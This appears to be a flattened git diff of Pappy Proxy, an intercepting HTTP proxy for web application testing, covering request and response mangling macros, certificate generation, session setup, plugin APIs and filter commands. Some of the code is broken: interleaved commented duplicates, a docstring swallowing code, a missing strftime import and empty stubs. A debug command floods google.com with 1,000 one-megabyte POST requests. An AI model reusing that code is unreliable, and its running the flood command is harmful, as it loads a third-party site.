# copy unique data to new request and clear it off old one
cur_req.unmangled = request
cur_req.unmangled.is_unmangled_version = True
if request.response:
cur_req.response = request.response
request.response = None
mangled = True
else:
# return the original request
cur_req = request
defer.returnValue((cur_req, mangled))
# mangled = False
# if not cur_req == request or \
# not cur_req.host == request.host or \
# not cur_req.port == request.port or \
# not cur_req.is_ssl == request.is_ssl:
# # copy unique data to new request and clear it off old one
# cur_req.unmangled = request
# cur_req.unmangled.is_unmangled_version = True
# if request.response:
# cur_req.response = request.response
# request.response = None
# mangled = True
# else:
# # return the original request
# cur_req = request
# defer.returnValue((cur_req, mangled))
@defer.inlineCallbacks
def mangle_response(request, intmacros):
"""
Mangle a request's response with a list of intercepting macros.
Returns a bool stating whether the request's response was modified.
Unmangled values will be updated as needed.
# @defer.inlineCallbacks
# def mangle_response(request, intmacros):
# """
# Mangle a request's response with a list of intercepting macros.
# Returns a bool stating whether the request's response was modified.
# Unmangled values will be updated as needed.
:rtype: Bool
"""
if not intmacros:
defer.returnValue(False)
# :rtype: Bool
# """
# if not intmacros:
# defer.returnValue(False)
old_rsp = request.response
for macro in intmacros:
if macro.intercept_responses:
# We copy so that changes to request.response doesn't mangle the original response
request.response = request.response.copy()
if macro.async_rsp:
request.response = yield macro.async_mangle_response(request)
else:
request.response = macro.mangle_response(request)
# old_rsp = request.response
# for macro in intmacros:
# if macro.intercept_responses:
# # We copy so that changes to request.response doesn't mangle the original response
# request.response = request.response.copy()
# if macro.async_rsp:
# request.response = yield macro.async_mangle_response(request)
# else:
# request.response = macro.mangle_response(request)
if request.response is None:
defer.returnValue(True)
# if request.response is None:
# defer.returnValue(True)
mangled = False
if not old_rsp == request.response:
request.response.rspid = old_rsp
old_rsp.rspid = None
request.response.unmangled = old_rsp
request.response.unmangled.is_unmangled_version = True
mangled = True
else:
request.response = old_rsp
defer.returnValue(mangled)
# mangled = False
# if not old_rsp == request.response:
# request.response.rspid = old_rsp
# old_rsp.rspid = None
# request.response.unmangled = old_rsp
# request.response.unmangled.is_unmangled_version = True
# mangled = True
# else:
# request.response = old_rsp
# defer.returnValue(mangled)
@defer.inlineCallbacks
def mangle_websocket_message(message, request, intmacros):
# Mangle messages with list of intercepting macros
if not intmacros:
defer.returnValue((message, False))
# @defer.inlineCallbacks
# def mangle_websocket_message(message, request, intmacros):
# # Mangle messages with list of intercepting macros
# if not intmacros:
# defer.returnValue((message, False))
cur_msg = message.copy()
for macro in intmacros:
if macro.intercept_ws:
if macro.async_ws:
cur_msg = yield macro.async_mangle_ws(request, cur_msg.copy())
else:
cur_msg = macro.mangle_ws(request, cur_msg.copy())
# cur_msg = message.copy()
# for macro in intmacros:
# if macro.intercept_ws:
# if macro.async_ws:
# cur_msg = yield macro.async_mangle_ws(request, cur_msg.copy())
# else:
# cur_msg = macro.mangle_ws(request, cur_msg.copy())
if cur_msg is None:
defer.returnValue((None, True))
# if cur_msg is None:
# defer.returnValue((None, True))
mangled = False
if not cur_msg == message:
# copy unique data to new request and clear it off old one
cur_msg.unmangled = message
cur_msg.unmangled.is_unmangled_version = True
mangled = True
else:
# return the original request
cur_msg = message
defer.returnValue((cur_msg, mangled))
# mangled = False
# if not cur_msg == message:
# # copy unique data to new request and clear it off old one
# cur_msg.unmangled = message
# cur_msg.unmangled.is_unmangled_version = True
# mangled = True
# else:
# # return the original request
# cur_msg = message
# defer.returnValue((cur_msg, mangled))

View file

@ -1,78 +0,0 @@
import copy
import os
import string
import subprocess
import tempfile
import pappyproxy
from pappyproxy import http
from twisted.internet import defer
MACRO_NAME = 'Pappy Text Editor Interceptor'
@defer.inlineCallbacks
def async_mangle_request(request):
# This function gets called to mangle/edit requests passed through the proxy
retreq = request
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_request)
# Have the console edit the file
yield pappyproxy.console.edit_file(tfName)
# Create new mangled request from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Request dropped!')
defer.returnValue(None)
mangled_req = http.Request(text, update_content_length=True)
mangled_req.port = request.port
mangled_req.is_ssl = request.is_ssl
# Check if it changed
if mangled_req.full_request != request.full_request:
retreq = mangled_req
defer.returnValue(retreq)
@defer.inlineCallbacks
def async_mangle_response(request):
# This function gets called to mangle/edit respones passed through the proxy
retrsp = request.response
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.response.full_response)
# Have the console edit the file
yield pappyproxy.console.edit_file(tfName, front=True)
# Create new mangled response from edited file
with open(tfName, 'r') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
pappyproxy.proxy.log('Response dropped!')
defer.returnValue(None)
mangled_rsp = http.Response(text, update_content_length=True)
if mangled_rsp.full_response != request.response.full_response:
mangled_rsp.unmangled = request.response
retrsp = mangled_rsp
defer.returnValue(retrsp)

142
pappyproxy/pap.py Normal file
View file

@ -0,0 +1,142 @@
#!/usr/bin/env python3
import argparse
import sys
import time
import os
from .proxy import HTTPRequest, ProxyClient, MessageError
from .console import interface_loop
from .config import ProxyConfig
from .util import confirm
def fmt_time(t):
timestr = strftime("%Y-%m-%d %H:%M:%S.%f", t)
return timestr
def print_msg(msg, title):
print("-"*10 + " " + title + " " + "-"*10)
print(msg.full_message().decode())
def print_rsp(rsp):
print_msg(rsp, "RESPONSE")
if rsp.unmangled:
print_msg(rsp, "UNMANGLED RESPONSE")
def print_ws(ws):
print("ToServer=%s, IsBinary=%s")
print(ws.message)
def print_req(req):
print_msg(req, "REQUEST")
if req.unmangled:
print_msg(req, "UNMANGLED REQUEST")
if req.response:
print_rsp(req.response)
def generate_certificates(client, path):
try:
os.makedirs(path, 0o755)
except os.error as e:
if not os.path.isdir(path):
raise e
pkey_file = os.path.join(path, 'server.key')
cert_file = os.path.join(path, 'server.pem')
client.generate_certificates(pkey_file, cert_file)
def load_certificates(client, path):
client.load_certificates(os.path.join(path, "server.pem"),
os.path.join(path, "server.key"))
def main():
parser = argparse.ArgumentParser(description="Pappy client")
parser.add_argument("--binary", nargs=1, help="location of the backend binary")
parser.add_argument("--attach", nargs=1, help="attach to an already running backend")
parser.add_argument("--dbgattach", nargs=1, help="attach to an already running backend and also perform setup")
parser.add_argument('--debug', help='run in debug mode', action='store_true')
parser.add_argument('--lite', help='run in lite mode', action='store_true')
args = parser.parse_args()
if args.binary is not None and args.attach is not None:
print("Cannot provide both a binary location and an address to connect to")
exit(1)
data_dir = os.path.join(os.path.expanduser('~'), '.pappy')
if args.binary is not None:
binloc = args.binary[0]
msg_addr = None
elif args.attach is not None or args.dbgattach:
binloc = None
if args.attach is not None:
msg_addr = args.attach[0]
if args.dbgattach is not None:
msg_addr = args.dbgattach[0]
else:
msg_addr = None
try:
# Try to get the binary from GOPATH
gopath = os.environ["GOPATH"]
binloc = os.path.join(gopath, "bin", "puppy")
except:
# Try to get the binary from ~/.pappy/puppy
binloc = os.path.join(data_dir, "puppy")
if not os.path.exists(binloc):
print("Could not find puppy binary in GOPATH or ~/.pappy. Please ensure that it has been compiled, or pass in the binary location from the command line")
exit(1)
config = ProxyConfig()
if not args.lite:
config.load("./config.json")
cert_dir = os.path.join(data_dir, "certs")
with ProxyClient(binary=binloc, conn_addr=msg_addr, debug=args.debug) as client:
try:
load_certificates(client, cert_dir)
except MessageError as e:
print(str(e))
if(confirm("Would you like to generate the certificates now?", "y")):
generate_certificates(client, cert_dir)
print("Certificates generated to {}".format(cert_dir))
print("Be sure to add {} to your trusted CAs in your browser!".format(os.path.join(cert_dir, "server.pem")))
load_certificates(client, cert_dir)
else:
print("Can not run proxy without SSL certificates")
exit(1)
try:
# Only try and listen/set default storage if we're not attaching
if args.attach is None:
if args.lite:
storage = client.add_in_memory_storage("")
else:
storage = client.add_sqlite_storage("./data.db", "")
client.disk_storage = storage
client.inmem_storage = client.add_in_memory_storage("m")
client.set_proxy_storage(storage.storage_id)
for iface, port, transparent in config.listeners:
try:
if transparent is not None:
destHost, destPort, destUseTLS = transparent
client.add_listener(iface, port, transparent=True,
destHost=destHost, destPort=destPort, destUseTLS=destUseTLS)
else:
client.add_listener(iface, port)
except MessageError as e:
print(str(e))
# Set upstream proxy
if config.use_proxy:
client.set_proxy(config.use_proxy,
config.proxy_host,
config.proxy_port,
config.is_socks_proxy)
interface_loop(client)
except MessageError as e:
print(str(e))
if __name__ == "__main__":
main()
def start():
main()

View file

@ -1,296 +0,0 @@
#!/usr/bin/env python2
"""
Handles the main Pappy session.
.. data:: session
The :class:`pappyproxy.pappy.PappySession` object for the current session. Mainly
used for accessing the session's config information.
"""
import crochet
import txaio
crochet.no_setup()
txaio.use_twisted()
import argparse
import datetime
import os
import schema.update
import shutil
import sys
import tempfile
import signal
from . import comm
from . import config
from . import compress
from . import context
from . import crypto
from . import http
from .console import ProxyCmd
from .util import PappyException
from twisted.enterprise import adbapi
from twisted.internet import reactor, defer
from twisted.internet.error import CannotListenError
from twisted.internet.protocol import ServerFactory
from twisted.internet.threads import deferToThread
main_context = context.Context()
all_contexts = [main_context]
session = None
quit_confirm_time = None
try:
from guppy import hpy
heapstats = hpy()
heapstats.setref()
except ImportError:
heapstats = None
class PappySession(object):
"""
An object representing a pappy session. Mainly you'll only use this to get to
the session config.
:ivar config: The configuration settings for the session
:vartype config: :class:`pappyproxy.config.PappyConfig`
"""
def __init__(self, sessconfig):
self.config = sessconfig
self.complete_defer = defer.Deferred()
self.server_factories = []
self.plugin_loader = None
self.cons = None
self.dbpool = None
self.delete_data_on_quit = False
self.ports = None
self.crypto = crypto.Crypto(sessconfig)
@defer.inlineCallbacks
def start(self):
from . import proxy, plugin
if self.config.crypt_session:
if self.decrypt():
self.config.load_from_file('./config.json')
self.config.global_load_from_file()
self.delete_data_on_quit = False
else:
self.complete_defer.callback(None)
return
# If the data file doesn't exist, create it with restricted permissions
if not os.path.isfile(self.config.datafile):
with os.fdopen(os.open(self.config.datafile, os.O_CREAT, 0o0600), 'r'):
pass
self.dbpool = adbapi.ConnectionPool("sqlite3", self.config.datafile,
check_same_thread=False,
cp_openfun=set_text_factory,
cp_max=1)
try:
yield schema.update.update_schema(self.dbpool, self.config.datafile)
except Exception as e:
print 'Error updating schema: %s' % e
print 'Exiting...'
self.complete_defer.callback(None)
return
http.init(self.dbpool)
yield http.Request.cache.load_ids()
context.reset_context_caches()
# Run the proxy
if self.config.debug_dir and os.path.exists(self.config.debug_dir):
shutil.rmtree(self.config.debug_dir)
print 'Removing old debugging output'
listen_strs = []
self.ports = []
for listener in self.config.listeners:
#server_factory = proxy.ProxyServerFactory(save_all=True)
server_factory = proxy.ProxyProtocolFactory()
try:
if 'forward_host_ssl' in listener and listener['forward_host_ssl']:
server_factory.force_ssl = True
server_factory.forward_host = listener['forward_host_ssl']
elif 'forward_host' in listener and listener['forward_host']:
server_factory.force_ssl = False
server_factory.forward_host = listener['forward_host']
port = reactor.listenTCP(listener['port'], server_factory, interface=listener['interface'])
listener_str = 'port %d' % listener['port']
if listener['interface'] not in ('127.0.0.1', 'localhost'):
listener_str += ' (bound to %s)' % listener['interface']
listen_strs.append(listener_str)
self.ports.append(port)
self.server_factories.append(server_factory)
except CannotListenError as e:
print repr(e)
if listen_strs:
print 'Proxy is listening on %s' % (', '.join(listen_strs))
else:
print 'No listeners opened'
com_factory = ServerFactory()
com_factory.protocol = comm.CommServer
# Make the port different for every instance of pappy, then pass it to
# anything we run. Otherwise we can only have it running once on a machine
self.comm_port = reactor.listenTCP(0, com_factory, interface='127.0.0.1')
self.comm_port = self.comm_port.getHost().port
# Load the scope
yield context.load_scope(self.dbpool)
context.reset_to_scope(main_context)
sys.argv = [sys.argv[0]] # cmd2 tries to parse args
self.cons = ProxyCmd(session=session)
self.plugin_loader = plugin.PluginLoader(self.cons)
for d in self.config.plugin_dirs:
if not os.path.exists(d):
os.makedirs(d)
self.plugin_loader.load_directory(d)
# Add cleanup to defer
self.complete_defer = deferToThread(self.cons.cmdloop)
self.complete_defer.addCallback(self.cleanup)
def encrypt(self):
if self.crypto.encrypt_project():
return True
else:
return False
def decrypt(self):
# Attempt to decrypt project archive
if self.crypto.decrypt_project():
return True
# Quit pappy on failure
else:
return False
@defer.inlineCallbacks
def cleanup(self, ignored=None):
for port in self.ports:
yield port.stopListening()
if self.delete_data_on_quit:
print 'Deleting temporary datafile'
os.remove(self.config.datafile)
# Encrypt the project when in crypto mode
if self.config.crypt_session:
self.encrypt()
def parse_args():
# parses sys.argv and returns a settings dictionary
parser = argparse.ArgumentParser(description='An intercepting proxy for testing web applications.')
parser.add_argument('-l', '--lite', help='Run the proxy in "lite" mode', action='store_true')
parser.add_argument('-d', '--debug', help='Run the proxy in "debug" mode', action='store_true')
try:
hlpmsg = ''.join(['Start pappy in "crypto" mode,',
'must supply a name for the encrypted',
'project archive [CRYPT]'])
parser.add_argument('-c', '--crypt', type=str, nargs=1, help=hlpmsg)
except:
print 'Must supply a project name: pappy -c <project_name>'
reactor.stop()
defer.returnValue(None)
args = parser.parse_args(sys.argv[1:])
settings = {}
if args.lite:
settings['lite'] = True
else:
settings['lite'] = False
if args.crypt:
# Convert from single-item list produced by argparse `nargs=1`
settings['crypt'] = args.crypt[0].encode('utf-8')
else:
settings['crypt'] = None
if args.debug:
settings['debug'] = True
else:
settings['debug'] = False
return settings
def set_text_factory(conn):
conn.text_factory = str
def custom_int_handler(signum, frame):
# sorry
print "Sorry, we can't kill things partway through otherwise the data file might be left in a corrupt state"
@defer.inlineCallbacks
def main():
global session
try:
settings = parse_args()
except SystemExit:
print 'Did you mean to just start the console? If so, just run `pappy` without any arguments then enter commands into the prompt that appears.'
reactor.stop()
defer.returnValue(None)
pappy_config = config.PappyConfig()
if not os.path.exists(pappy_config.data_dir):
os.makedirs(pappy_config.data_dir)
session = PappySession(pappy_config)
signal.signal(signal.SIGINT, inturrupt_handler)
if settings['crypt']:
pappy_config.crypt_file = settings['crypt']
pappy_config.crypt_session = True
elif settings['lite']:
conf_settings = pappy_config.get_default_config()
conf_settings['debug_dir'] = None
conf_settings['debug_to_file'] = False
conf_settings['history_size'] = 0
with tempfile.NamedTemporaryFile(delete=False) as tf:
conf_settings['data_file'] = tf.name
print 'Temporary datafile is %s' % tf.name
session.delete_data_on_quit = True
pappy_config.load_settings(conf_settings)
else:
# Initialize config
pappy_config.load_from_file('./config.json')
pappy_config.global_load_from_file()
session.delete_data_on_quit = False
if settings['debug']:
pappy_config.debug = True
yield session.start()
session.complete_defer.addCallback(lambda ignored: reactor.stop())
def start():
reactor.callWhenRunning(main)
reactor.run()
def inturrupt_handler(signal, frame):
global session
global quit_confirm_time
if not quit_confirm_time or datetime.datetime.now() > quit_confirm_time:
print ''
print ('Interrupting will cause Pappy to quit completely. This will '
'cause any in-memory only requests to be lost, but all other '
'data will be saved.')
print ('Interrupt a second time to confirm.')
print ''
quit_confirm_time = datetime.datetime.now() + datetime.timedelta(0, 10)
else:
d = session.cleanup()
d.addBoth(lambda _: reactor.stop())
d.addBoth(lambda _: os._exit(1)) # Sorry blocking threads :(
if __name__ == '__main__':
start()

View file

@ -1,257 +0,0 @@
"""
This module contains all the api calls written for use in plugins. If you want
to do anything that is't allowed through these function calls or through the
functions provided for macros, contact me and I'll see what I can do to add some
more functionality into the next version.
"""
import glob
import imp
import os
import pappyproxy
import stat
import crochet
from twisted.internet import defer
from .colors import Colors
from .util import PappyException
class Plugin(object):
def __init__(self, cmd, fname=None):
self.cmd = cmd
self.filename = ''
self.source = None
self.module_name = ''
if fname:
self.filename = fname
self.load_file(fname)
def load_file(self, fname):
module_name = os.path.basename(os.path.splitext(fname)[0])
if os.path.basename(fname) == '__init__.py':
return
st = os.stat(fname)
if (st.st_mode & stat.S_IWOTH):
raise PappyException("Refusing to load world-writable plugin: %s" % fname)
self.source = imp.load_source('%s'%module_name, fname)
if hasattr(self.source, 'load_cmds'):
self.source.load_cmds(self.cmd)
else:
print ('WARNING: %s does not define load_cmds. It will not be '
'possible to interact with the plugin through the console.' % fname)
self.module_name = module_name
class PluginLoader(object):
def __init__(self, cmd):
self.cmd = cmd
self.loaded_plugins = []
self.plugins_by_name = {}
def load_plugin(self, fname):
p = Plugin(self.cmd, fname)
self.loaded_plugins.append(p)
self.plugins_by_name[p.module_name] = p
def load_directory(self, directory):
fnames = glob.glob(os.path.join(directory, '*.py'))
for fname in fnames:
try:
self.load_plugin(fname)
except PappyException as e:
print str(e)
##########################
## Plugin helper functions
def plugin_by_name(name):
"""
Returns an interface to access the methods of a plugin from its
name. For example, to call the ``foo`` function from the ``bar``
plugin you would call ``plugin_by_name('bar').foo()``.
"""
import pappyproxy.pappy
if name in pappyproxy.pappy.plugin_loader.plugins_by_name:
return pappyproxy.pappy.plugin_loader.plugins_by_name[name].source
else:
raise PappyException('No plugin with name %s is loaded' % name)
def add_intercepting_macro(name, macro):
"""
Adds an intercepting macro to the proxy. You can either use a
:class:`pappyproxy.macros.FileInterceptMacro` to load an
intercepting macro from the disk, or you can create your own using
an :class:`pappyproxy.macros.InterceptMacro` for a base class. You
must give a unique name that will be used in
:func:`pappyproxy.plugin.remove_intercepting_macro` to deactivate
it. Remember that activating an intercepting macro will disable
request streaming and will affect performance. So please try and
only use this if you may need to modify messages before they are
passed along.
"""
for factory in pappyproxy.pappy.session.server_factories:
factory.add_intercepting_macro(macro, name=name)
def remove_intercepting_macro(name):
"""
Stops an active intercepting macro. You must pass in the name that
you used when calling
:func:`pappyproxy.plugin.add_intercepting_macro` to identify which
macro you would like to stop.
"""
for factory in pappyproxy.pappy.session.server_factories:
factory.remove_intercepting_macro(name=name)
def active_intercepting_macros():
"""
Returns a dict of the active intercepting macro objects. Modifying
this list will not affect which macros are active.
"""
# every factory should have the same int macros so screw it we'll
# just use the macros from the first one
ret = []
if len(pappyproxy.pappy.session.server_factories) > 0:
ret = pappyproxy.pappy.session.server_factories[0].get_macro_list()
return ret
def in_memory_reqs():
"""
Returns a list containing the ids of the requests which exist in
memory only (requests with an m## style id). You can call either
:func:`pappyproxy.http.Request.save` or
:func:`pappyproxy.http.Request.async_deep_save` to save the
request to the data file.
"""
return list(pappyproxy.http.Request.cache.inmem_reqs)
def req_history(num=-1, ids=None, include_unmangled=False):
"""
Returns an a generator that generates deferreds which resolve to
requests in history, ignoring the current context. If ``n`` is
given, it will stop after ``n`` requests have been generated. If
``ids`` is given, it will only include those IDs. If
``include_unmangled`` is True, then the iterator will include
requests which are the unmangled version of other requests.
An example of using the iterator to print the 10 most recent requests::
@defer.inlineCallbacks
def find_food():
for req_d in req_history(10):
req = yield req_d
print '-'*10
print req.full_message_pretty
"""
return pappyproxy.Request.cache.req_it(num=num, ids=ids, include_unmangled=include_unmangled)
def async_main_context_ids(n=-1):
"""
Returns a deferred that resolves into a list of up to ``n`` of the
most recent requests in the main context. You can then use
:func:`pappyproxy.http.Request.load_request` to load the requests
in the current context. If no value is passed for ``n``, this will
return all of the IDs in the context.
"""
return pappyproxy.pappy.main_context.get_reqs(n)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def main_context_ids(*args, **kwargs):
"""
Same as :func:`pappyproxy.plugin.async_main_context_ids` but can be called
from macros and other non-async only functions. Cannot be called in async
functions.
"""
ret = yield async_main_context_ids(*args, **kwargs)
defer.returnValue(ret)
def add_to_history(req):
"""
Save a request to history without saving it to the data file. The request
will only be saved in memory, so when the program is exited or `clrmem`
is run, the request will be deleted.
:param req: The request to add to history
:type req: :class:`pappyproxy.http.Request`
"""
pappyproxy.http.Request.cache.add(req)
pappyproxy.context.reset_context_caches()
def get_active_filter_strings():
"""
Returns a list of filter strings representing the currently active filters
"""
filts = pappyproxy.pappy.main_context.active_filters
strs = []
for f in filts:
strs.append(f.filter_string)
return strs
def run_cmd(cmd):
"""
Run a command as if you typed it into the console. Try and use
existing APIs to do what you want before using this.
"""
pappyproxy.pappy.cons.onecmd(cmd)
def require_modules(*largs):
"""
A wrapper to make sure that plugin dependencies are installed. For example,
if a command requires the ``psutil`` and ``objgraph`` package, you should
format your command like::
@require_modules('psutil', 'objgraph')
def my_command(line):
import objgraph
import psutil
# ... rest of command ...
If you try to run the command without being able to import all of the required
modules, the command will print an error and not run the command.
"""
def wr(func):
def wr2(*args, **kwargs):
missing = []
for l in largs:
try:
imp.find_module(l)
except ImportError:
missing.append(l)
if missing:
print 'Command requires %s module(s)' % (', '.join([Colors.RED+m+Colors.ENDC for m in missing]))
else:
return func(*args, **kwargs)
return wr2
return wr
def set_context_to_saved(name):
"""
Sets the current context to the context saved under the given name.
Raises PappyException if name does not exist
"""
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def delete_saved_context(name):
"""
Deletes the saved context with the given name.
Raises PappyException if name does not exist
"""
def save_current_context(name):
"""
Saves the current context under the given name.
"""
def save_context(name, filter_strs):
"""
Takes a list of filter strings and saves it as a context under the given name.
:param name: The name to save the context under
:type name: string
:param filter_strs: The in-order list of filter strings of the context to save.
:type filter_strs: List of strings
"""

View file

@ -1,151 +0,0 @@
import gc
import shlex
import code
import crochet
import os
import resource
import random
import datetime
from pappyproxy.http import Request, post_request
from pappyproxy.util import PappyException
from pappyproxy.requestcache import RequestCache
from pappyproxy.util import print_requests
from pappyproxy.pappy import heapstats, session
from pappyproxy.plugin import require_modules
from twisted.internet import defer
def cache_info(line):
c = Request.cache
print 'Cache has %d/%d slots filled' % (len(c._cached_reqs), c._cache_size)
print 'Hit score: {0:.2f} ({1}/{2})'.format(c.hit_ratio, c.hits, c.hits+c.misses)
print ''
if line != 'q':
rl = [v for k, v in Request.cache._cached_reqs.iteritems()]
rs = sorted(rl, key=lambda r: Request.cache._last_used[r.reqid], reverse=True)
print_requests(rs)
@require_modules('psutil')
def memory_info(line):
import psutil
proc = psutil.Process(os.getpid())
mem = proc.memory_info().rss
megabyte = (float(mem)/1024)/1024
print 'Memory usage: {0:.2f} Mb ({1} bytes)'.format(megabyte, mem)
@require_modules('guppy')
def heap_info(line):
size = heapstats.heap().size
print 'Heap usage: {0:.2f} Mb'.format(size/(1024.0*1024.0))
print heapstats.heap()
def limit_info(line):
rsrc = resource.RLIMIT_AS
soft, hard = resource.getrlimit(rsrc)
print 'Soft limit starts as:', soft
print 'Hard limit starts as:', hard
if line:
limit_mb = int(line)
limit_kb = int(line)*1024
print 'Setting limit to %s Mb' % limit_mb
resource.setrlimit(rsrc, (limit_kb, hard)) #limit to one kilobyte
soft, hard = resource.getrlimit(rsrc)
print 'Soft limit is now:', soft
print 'Hard limit is now:', hard
@require_modules('objgraph')
def graph_randobj(line):
import objgraph
args = shlex.split(line)
if len(args) > 1:
fname = args[1]
else:
fname = 'chain.png'
print 'Getting random %s object...' % args[0]
obj = random.choice(objgraph.by_type(args[0]))
print 'Creating chain...'
chain = objgraph.find_backref_chain(obj, objgraph.is_proper_module)
print 'Saving chain...'
objgraph.show_chain(chain, filename=fname)
def heapdo(line):
if heapstats is None:
raise PappyException('Command requires the guppy library')
h = heapstats.heap()
code.interact(local=locals())
def collect(line):
gc.collect()
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def loadblock(line):
args = shlex.split(line)
yield Request.cache.load(args[0], int(args[1]))
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def big_fucking_data_file(line):
print "Generating some giant fucking requests"
for i in range(1000):
if i % 20 == 0:
print 'Generated %d' % i
r = post_request('https://www.google.com')
r.body = 'A'*(1024*1024)
yield r.async_deep_save()
def time_cmd(line):
print 'Timing `%s`...' % line
start = datetime.datetime.now()
session.cons.onecmd(line.strip())
end = datetime.datetime.now()
total_time = (end-start).total_seconds()
print '`{0}` took {1:.3f} seconds'.format(line, total_time)
def cache_data(line):
args = shlex.split(line)
reqid = args[0]
cached = reqid in Request.cache._cached_reqs
if reqid in Request.cache._last_used:
last_used = Request.cache._last_used[reqid]
else:
last_used = 'NOT IN _last_used'
in_all = reqid in Request.cache.all_ids
in_unmangled = reqid in Request.cache.unmangled_ids
try:
ordered_ids_pos = Request.cache.ordered_ids.index(reqid)
except ValueError:
ordered_ids_pos = 'Not in ordered_ids'
in_inmem = reqid in Request.cache.inmem_reqs
print ''
print 'Cache data about request %s ----------' % reqid
print 'Cahced: %s' % cached
print 'Last used: %s' % last_used
print 'In all_ids: %s' % in_all
print 'In unmangled: %s' % in_unmangled
print 'Ordered id pos: %s' % ordered_ids_pos
print 'Is inmem: %s' % in_inmem
print ''
def check_cache(line):
Request.cache.assert_ids()
def load_cmds(cmd):
cmd.set_cmds({
'cacheinfo': (cache_info, None),
'heapinfo': (heap_info, None),
'memlimit': (limit_info, None),
'heapdo': (heapdo, None),
'gccollect': (collect, None),
'graphobj': (graph_randobj, None),
'meminfo': (memory_info, None),
'genbigdata': (big_fucking_data_file, None),
'checkcache': (check_cache, None),
'loadblock': (loadblock, None),
'time': (time_cmd, None),
'cachedata': (cache_data, None),
})
cmd.add_aliases([
])

View file

@ -1,259 +0,0 @@
import crochet
import pappyproxy
from pappyproxy.util import PappyException, confirm, autocomplete_startswith
from pappyproxy.http import Request
from pappyproxy.context import save_context, delete_saved_context, get_saved_context, get_all_saved_contexts
from twisted.internet import defer
class BuiltinFilters(object):
_filters = {
'not_image': (
['path nctr "(\.png$|\.jpg$|\.gif$)"'],
'Filter out image requests',
),
'not_jscss': (
['path nctr "(\.js$|\.css$)"'],
'Filter out javascript and css files',
),
}
@staticmethod
@defer.inlineCallbacks
def get(name):
if name not in BuiltinFilters._filters:
raise PappyException('%s not a bult in filter' % name)
if name in BuiltinFilters._filters:
filters = [pappyproxy.context.Filter(f) for f in BuiltinFilters._filters[name][0]]
for f in filters:
yield f.generate()
defer.returnValue(filters)
raise PappyException('"%s" is not a built-in filter' % name)
@staticmethod
def list():
return [k for k, v in BuiltinFilters._filters.iteritems()]
@staticmethod
def help(name):
if name not in BuiltinFilters._filters:
raise PappyException('"%s" is not a built-in filter' % name)
return pappyproxy.context.Filter(BuiltinFilters._filters[name][1])
def complete_filtercmd(text, line, begidx, endidx):
strs = [k for k, v in pappyproxy.context.Filter._filter_functions.iteritems()]
strs += [k for k, v in pappyproxy.context.Filter._async_filter_functions.iteritems()]
return autocomplete_startswith(text, strs)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def filtercmd(line):
"""
Apply a filter to the current context
Usage: filter <filter string>
See README.md for information on filter strings
"""
if not line:
raise PappyException("Filter string required")
filter_to_add = pappyproxy.context.Filter(line)
yield filter_to_add.generate()
pappyproxy.pappy.main_context.add_filter(filter_to_add)
def complete_builtin_filter(text, line, begidx, endidx):
all_names = BuiltinFilters.list()
if not text:
ret = all_names[:]
else:
ret = [n for n in all_names if n.startswith(text)]
return ret
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def builtin_filter(line):
if not line:
raise PappyException("Filter name required")
filters_to_add = yield BuiltinFilters.get(line)
for f in filters_to_add:
print f.filter_string
yield pappyproxy.pappy.main_context.add_filter(f)
defer.returnValue(None)
def filter_up(line):
"""
Remove the last applied filter
Usage: filter_up
"""
pappyproxy.pappy.main_context.filter_up()
def filter_clear(line):
"""
Reset the context so that it contains no filters (ignores scope)
Usage: filter_clear
"""
pappyproxy.pappy.main_context.set_filters([])
def filter_list(line):
"""
Print the filters that make up the current context
Usage: filter_list
"""
for f in pappyproxy.pappy.main_context.active_filters:
print f.filter_string
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def scope_save(line):
"""
Set the scope to be the current context. Saved between launches
Usage: scope_save
"""
pappyproxy.context.save_scope(pappyproxy.pappy.main_context)
yield pappyproxy.context.store_scope(pappyproxy.http.dbpool)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def scope_reset(line):
"""
Set the context to be the scope (view in-scope items)
Usage: scope_reset
"""
yield pappyproxy.context.reset_to_scope(pappyproxy.pappy.main_context)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def scope_delete(line):
"""
Delete the scope so that it contains all request/response pairs
Usage: scope_delete
"""
pappyproxy.context.set_scope([])
yield pappyproxy.context.store_scope(pappyproxy.http.dbpool)
def scope_list(line):
"""
Print the filters that make up the scope
Usage: scope_list
"""
pappyproxy.context.print_scope()
#@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def filter_prune(line):
"""
Delete all out of context requests from the data file.
CANNOT BE UNDONE!! Be careful!
Usage: filter_prune
"""
# Delete filtered items from datafile
print ''
print 'Currently active filters:'
for f in pappyproxy.pappy.main_context.active_filters:
print '> %s' % f.filter_string
# We copy so that we're not removing items from a set we're iterating over
act_reqs = yield pappyproxy.pappy.main_context.get_reqs()
inact_reqs = set(Request.cache.req_ids()).difference(set(act_reqs))
message = 'This will delete %d/%d requests. You can NOT undo this!! Continue?' % (len(inact_reqs), (len(inact_reqs) + len(act_reqs)))
#print message
if not confirm(message, 'n'):
defer.returnValue(None)
for reqid in inact_reqs:
try:
req = yield pappyproxy.http.Request.load_request(reqid)
yield req.deep_delete()
except PappyException as e:
print e
print 'Deleted %d requests' % len(inact_reqs)
defer.returnValue(None)
@defer.inlineCallbacks
def _save_filters_to(key):
if key == '':
raise PappyException("Must give name to save filters as")
strs = pappyproxy.plugin.get_active_filter_strings()
yield save_context(key, strs, pappyproxy.http.dbpool)
defer.returnValue(strs)
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def save_filter_set(line):
if line == '':
raise PappyException("Must give name to save filters as")
strs = yield _save_filters_to(line)
print 'Filters saved to %s:' % line
for s in strs:
print ' %s' % s
@crochet.wait_for(timeout=None)
@defer.inlineCallbacks
def load_filter_set(line):
if line == '':
raise PappyException("Must give name to save filters as")
strs = yield get_saved_context(line, pappyproxy.http.dbpool)
yield _save_filters_to('_')
pappyproxy.pappy.main_context.set_filters([])
